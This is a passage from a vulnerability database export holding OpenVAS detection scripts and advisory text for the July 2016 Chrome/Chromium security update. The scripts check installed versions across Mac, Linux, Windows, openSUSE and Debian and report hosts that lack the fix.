Updates(stable-channel-update-2016-07)-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808265\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\",\n \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\",\n \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\",\n \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\",\n \"CVE-2016-5137\", \"CVE-2016-1705\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 13:12:56 +0530 (Fri, 22 Jul 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-2016-07)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - Sandbox escape in PPAPI\n\n - URL spoofing on iOS\n\n - Use-after-free in Extensions\n\n - Heap-buffer-overflow in sfntly\n\n - Same-origin bypass in Blink\n\n - Use-after-free in Blink\n\n - Same-origin bypass in V8\n\n - Memory corruption in V8\n\n - URL spoofing\n\n - Use-after-free in libxml\n\n - Limited same-origin bypass in Service Workers\n\n - Origin confusion in proxy authentication\n\n - URL leakage via PAC script\n\n - Content-Security-Policy bypass\n\n - Use after free in extensions\n\n - History sniffing with HSTS and CSP\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerabilities\n will allow remote attackers to bypass security, to cause denial of service and\n some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 52.0.2743.82 on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 52.0.2743.82 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/07/stable-channel-update.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"52.0.2743.82\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"52.0.2743.82\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:22", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-2016-07)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310808264", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808264", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-2016-07)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808264\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\",\n \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\",\n \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\",\n \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\",\n \"CVE-2016-5137\", \"CVE-2016-1705\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 13:12:56 +0530 (Fri, 22 Jul 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-2016-07)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - Sandbox escape in PPAPI\n\n - URL spoofing on iOS\n\n - Use-after-free in Extensions\n\n - Heap-buffer-overflow in sfntly\n\n - Same-origin bypass in Blink\n\n - Use-after-free in Blink\n\n - Same-origin bypass in V8\n\n - Memory corruption in V8\n\n - URL spoofing\n\n - Use-after-free in libxml\n\n - Limited same-origin bypass in Service Workers\n\n - Origin confusion in proxy authentication\n\n - URL leakage via PAC script\n\n - Content-Security-Policy bypass\n\n - Use after free in extensions\n\n - History sniffing with HSTS and CSP\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerabilities\n will allow remote attackers to bypass security, to cause denial of service and\n some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 52.0.2743.82 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 52.0.2743.82 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/07/stable-channel-update.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"52.0.2743.82\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"52.0.2743.82\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-02T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1865-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851369", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851369", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851369\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:56:28 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\",\n \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\",\n \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\",\n \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\",\n \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1865-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1865-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-02T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1869-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851370", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851370", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851370\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:57:38 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\",\n \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\",\n \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\",\n \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\",\n \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1869-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1869-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:42", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-2016-07)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310808263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808263", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-2016-07)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808263\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\",\n \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\",\n \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\",\n \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\",\n \"CVE-2016-5137\", \"CVE-2016-1705\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 13:12:56 +0530 (Fri, 22 Jul 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-2016-07)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - Sandbox escape in PPAPI\n\n - URL spoofing on iOS\n\n - Use-after-free in Extensions\n\n - Heap-buffer-overflow in sfntly\n\n - Same-origin bypass in Blink\n\n - Use-after-free in Blink\n\n - Same-origin bypass in V8\n\n - Memory corruption in V8\n\n - URL spoofing\n\n - Use-after-free in libxml\n\n - Limited same-origin bypass in Service Workers\n\n - Origin confusion in proxy authentication\n\n - URL leakage via PAC script\n\n - Content-Security-Policy bypass\n\n - Use after free in extensions\n\n - History sniffing with HSTS and CSP\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerabilities\n will allow remote attackers to bypass security, to cause denial of service and\n some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 52.0.2743.82 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 52.0.2743.82 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/07/stable-channel-update.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"52.0.2743.82\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"52.0.2743.82\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:13", "description": "Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-1704 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1705 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1706 \nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-1708 \nAdam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709 \nChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710 \nMariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711 \nMariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127 \ncloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128 \nA same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129 \nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2016-5130 \nWidih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131 \nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132 \nBen Kelly discovered a same-origin bypass.\n\nCVE-2016-5133 \nPatch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134 \nPaul Stone discovered an information leak in the Proxy Auto-Config\nfeature.\n\nCVE-2016-5135 \nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136 \nRob Wu discovered a use-after-free issue.\n\nCVE-2016-5137 \nXiaoyin Liu discovered a way to discover whether an HSTS web side had been\nvisited.", "cvss3": {}, "published": "2016-08-04T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3637-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1704", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703637", "href": "http://plugins.openvas.org/nasl.php?oid=703637", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3637.nasl 3798 2016-08-04 11:01:10Z antu123 $\n# Auto-generated from advisory DSA 3637-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, 